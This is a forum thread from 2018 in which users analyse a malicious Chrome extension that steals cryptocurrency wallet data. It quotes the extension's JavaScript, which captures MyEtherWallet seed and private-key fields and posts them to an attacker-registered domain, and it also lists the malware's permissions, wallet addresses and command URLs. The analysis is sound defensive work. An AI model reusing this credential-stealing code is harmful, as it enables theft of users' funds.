We need some help to decode a hacker addon

Initscri

hero member

Activity: 1582

Merit: 759

Quote from: ranman09 on December 21, 2018, 09:17:52 PM

Quote from: Piggy on December 16, 2018, 02:10:52 AM

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?

AFAIK, google releases the extensions onto the market without them being 100% verified first. There's just simply way too many extensions being uploaded, they wouldn't be able to manually approve each one.

They employ individuals to respond to reports, and perform spot checks (and I'm sure they have automated systems to catch most things/conventional attacks); but at the end of the day it's primarily up to the user to verify.

ranman09

full member

Activity: 756

Merit: 112

Quote from: Piggy on December 16, 2018, 02:10:52 AM

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?

Initscri

hero member

Activity: 1582

Merit: 759

Quote from: jjjfff on December 13, 2018, 04:40:05 AM

Note that no URL has ever been captured for help-tools.org

Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

Domain Name: HELP-TOOLS.ORG
Registry Domain ID: D402200000008508823-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2018-12-06T08:04:10Z
Creation Date: 2018-12-02T06:52:52Z

The domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate.

As expected the specific whois is anonymized:

Registrant Email: [email protected]
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255

Emails sent to [email protected] should reach the malware author though.

Did you include a pixel tracker in that? If they open the email and their email service provider doesn't block it, you'll get their IP address which may be useful to connect/identify the user.

Quote from: Piggy on December 16, 2018, 02:10:52 AM

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Quite the contrary, it's actually far easier to build & market a chrome extension (or FF) when compared to system level executable.

Let's face it, any script kiddie can basically build one with junior-level knowledge of Javascript.

If Google isn't checking the source, virtually no plugin/extension is 100% safe. I wouldn't be surprised if non-bitcoin related chrome extensions are built just waiting to pickup on Bitcoin related traffic.

KingZee

sr. member

Activity: 938

Merit: 452

Check your coin privilege

Quote from: bob123 on December 20, 2018, 04:38:45 AM

...

I'm not sure honestly. I know for a fact browser extensions can access the file system purely from my experience with past extensions. I spent about 30 minutes skimming google and their developer docs. If this is wrong on my end please let me know :

download any additional malware (add-ons are run within an isolated environment) : Downloading malware means the application needs permission to connect to its server, and needs write permission on the target machine. Examples of extensions with write permission : 3rd party session saving that restore your tabs, and any application that needs to store its state on your computer.
search through your file system : This means read permission. An extension that comes to mind is download managers and extensions that communicate with other applications.

So, API examples :

https://developer.chrome.com/apps/fileSystem : File System endpoint. After reading through this it looks like you can access absolute paths on the target machine.
https://developer.chrome.com/apps/storage : Storage endpoint. Note that this is a lot different because you can only access your own directory in AppData.
https://developer.chrome.com/extensions/nativeMessaging : Native messaging. Even though after reading through it, it looke like that it might be only possible for the app to send messages to other apps that they programmed themselves.

But even without mentioning all of these, just purely including complete browser access is a massive security risk. Especially for people who use web wallets. Like bob said the extension can run any arbitrary code on any webpage, access any session-related data, display/modify any forms.. Basically a complete takeover over your browser experience.

bob123

legendary

Activity: 1624

Merit: 2481

Quote from: Piggy on December 16, 2018, 02:10:52 AM

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users.

It depends on how you define safer.

A web browser extension can:

access all sites you visit
read / modify each information you enter on any website (e.g. usernames / passwords)
steal your cookies (which are a form of authentication)

However, a browser extension can NOT:

search through your file system
download any additional malware (add-ons are run within an isolated environment)
access your system at all
do anything non-browser-related
compromise your system

Running an executable on your system can do anything the user also is able to do (or even more if a privilege escalation is being abused).

seoincorporation

legendary

Activity: 3346

Merit: 3125

Quote from: Piggy on December 16, 2018, 02:10:52 AM

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Agree and it's sad, google and firefox should worry a little more for the customers, i know they are big platforms and should be hard for them to review their apps one by one, but c'mon we are almost in 2019 and that job could be done by artificial neural networks. A simple grep to verify if the app is hacking information from the main sites like google, outlook, or some social networks.

Is intolerable the fact that anyone can make this kind of apps and publish them as if there were no law.

Piggy

hero member

Activity: 784

Merit: 1416

Quote from: xBoxLive on December 16, 2018, 11:17:28 AM

It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?

I don't think they are going to be in any hurry to do that indeed. When you install the extension they are telling you the equivalent of "do it at your own risk". I guess they would act a bit faster just if they would start to lose money Roll Eyes

xBoxLive

member

Activity: 266

Merit: 25

Quote from: Piggy on December 16, 2018, 02:10:52 AM

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?

Piggy

hero member

Activity: 784

Merit: 1416

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

mistercoin

legendary

Activity: 1051

Merit: 1000

https://r.honeygain.me/XEDDM2B07C

Quote from: buwaytress on December 13, 2018, 04:20:26 AM

@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.

For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.

Sadly, I too believe this is the case. It will take a massive loss for the news to pick it up and spread the facts to the rest of the chrome users. I'm going to take a look at the source code and see if I can find any connections between the domains, addresses and people. I'll let you all know what I find. If only Google were as vigilant with their browser add-ons as they were with their YouTube platform takedown algorithms, our jobs would be a lot easier.. *sigh*

-MisterCoin

seoincorporation

legendary

Activity: 3346

Merit: 3125

Quote from: nuno12345 on December 13, 2018, 03:52:22 AM

Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:

Code:

if (location.href.indexOf('myetherwallet') > -1) {
   function kurilkaNJSmo() {
   document.onkeyup = function(e) {
   e = e || window.event;
   if (e.keyCode === 13) {
   var seeddas = $("#aria4").val();
   var pkk = $("#aria6").val();
   var myseedwal = seeddas + ' + ' + pkk;
   $.ajax({
   type: 'POST',
   url: 'https://help-tools.org/courses/currentc.php',
   crossDomain: !0,
   data: {
   meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
   },
   dataType: 'html',
   })
   }
   return !1
   }
   document.body.addEventListener("click", function(event) {
   if (event.toElement.className == "btn btn-primary ng-scope") {
   console.log("go");
   var seeddas = $("#aria4").val();
   var pkk = $("#aria6").val();
   var myseedwal = seeddas + ' + ' + pkk;
   $.ajax({
   type: 'POST',
   url: 'https://help-tools.org/courses/currentc.php',
   crossDomain: !0,
   data: {
   meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
   },
   dataType: 'html',
   })
   }
   })
   }
   setTimeout(kurilkaNJSmo, 2000)
}

That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.

EDIT:
Addresses of the thief:

Code:

CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c

Thanks nuno12345 that's some great information, was the kind of info i was searching for. I leave you some merits. Cheesy

KingZee

sr. member

Activity: 938

Merit: 452

Check your coin privilege

Quote from: jjjfff on December 13, 2018, 04:40:05 AM

Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

I was just going to say that, it's a 404 on the main page, fresh domain, hacked my ass.

I can't think of any way to prevent this from happening to your typical user. If someone thinks that it's possible for an addon, to monitor other downloaded addons, before they're installed, to check for patterns, then it might be possible to make a quick solution to prevent this in the future.

You should all remember that the perpetrator is constantly promoting his scam here using newbie accounts, and probably reads all of this, so hello scammer, we're trying to stop you Cheesy

jjjfff

copper member

Activity: 182

Merit: 18

Crypto.BI

Note that no URL has ever been captured for help-tools.org

Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

Domain Name: HELP-TOOLS.ORG
Registry Domain ID: D402200000008508823-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2018-12-06T08:04:10Z
Creation Date: 2018-12-02T06:52:52Z

The domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate.

As expected the specific whois is anonymized:

Registrant Email: [email protected]
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255

Emails sent to [email protected] should reach the malware author though.

nuno12345

sr. member

Activity: 276

Merit: 284

I understand.

What if someone makes an extension to block this type of behaviour?

Requests could be blocked to certain urls, cors enforced, etc.

By having an external list, say being grabbed from github it could be updated much quicker than relying on google or registrars to take down extensions/domains

buwaytress

legendary

Activity: 2968

Merit: 3684

Join the world-leading crypto sportsbook NOW!

@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.

For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.

nuno12345

sr. member

Activity: 276

Merit: 284

Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:

Code:

if (location.href.indexOf('myetherwallet') > -1) {
   function kurilkaNJSmo() {
   document.onkeyup = function(e) {
   e = e || window.event;
   if (e.keyCode === 13) {
   var seeddas = $("#aria4").val();
   var pkk = $("#aria6").val();
   var myseedwal = seeddas + ' + ' + pkk;
   $.ajax({
   type: 'POST',
   url: 'https://help-tools.org/courses/currentc.php',
   crossDomain: !0,
   data: {
   meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
   },
   dataType: 'html',
   })
   }
   return !1
   }
   document.body.addEventListener("click", function(event) {
   if (event.toElement.className == "btn btn-primary ng-scope") {
   console.log("go");
   var seeddas = $("#aria4").val();
   var pkk = $("#aria6").val();
   var myseedwal = seeddas + ' + ' + pkk;
   $.ajax({
   type: 'POST',
   url: 'https://help-tools.org/courses/currentc.php',
   crossDomain: !0,
   data: {
   meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
   },
   dataType: 'html',
   })
   }
   })
   }
   setTimeout(kurilkaNJSmo, 2000)
}

That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.

EDIT:
Addresses of the thief:

Code:

CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c

seoincorporation

legendary

Activity: 3346

Merit: 3125

A lot of users on the forum are getting scammed this way as you can see on the next links:

https://bitcointalksearch.org/topic/amazing-attempt-to-scam-read-laugh-and-report-it-cryptocashbackorg-5083404
https://bitcointalksearch.org/topic/conversation-with-the-hacker-who-stole-funds-from-us-5083139
https://bitcointalksearch.org/topic/new-scam-schema-on-the-forum-5081286

So, the add-on has been taken down and they upload it with another name, now is called CCB Cash.

https://chrome.google.com/webstore/detail/%D1%81cb-cash/liachincjagnalnmahhaioaogkngbmhf?hl=en-US&gl=MX

So, there is an extension to view source code from any addon, it's called 'Chrome extension source viewer'

When i take a look to this code i realized how bad it is...

Code:

"name": "CCB Cash",
"permissions": [
"activeTab",
"tabs",
"cookies",
"*://github.com/*",
"*://api.github.com/*",
"*://exmo.me/*",
"*://*.twitter.com/*",
"*://*.coinbase.com/*",
"*://qq.com/*",
"*://*.hbg.com/*",
"*://hitbtc.com/*",
"*://twitter.com/*",
"*://*.binance.com/*",
"*://*.localbitcoins.com/*",
"*://localbitcoins.com/*",
"*://blockchain.com/*",
"*://*.exmo.com/*",
"*://cryptodraw.org/*",
"*://exmo.com/*",
"*://*.live.com/*",
"*://bitfinex.com/*",
"*://hbg.com/*",
"*://*.yahoo.com/*",
"*://google.com/*",
"*://*.bitfinex.com/*",
"*://*.hitbtc.com/*",
"*://coinbase.com/*",
"*://*.huobi.com/*",
"*://*.google.com/*",
"*://*.exmo.me/*",
"*://huobi.com/*",
"*://yahoo.com/*",
"*://*.blockchain.com/*",
"*://myetherwallet.com/*",
"*://binance.com/*",
"*://*.myetherwallet.com/*",
"*://live.com/*",
"*://*.qq.com/*"
],

So, this time i ask for some help, maybe the developers can find some useful information about this APP to stop this hacker.

By the way, you don't have to install the addon to see the source.

Topic: We need some help to decode a hacker addon (Read 599 times)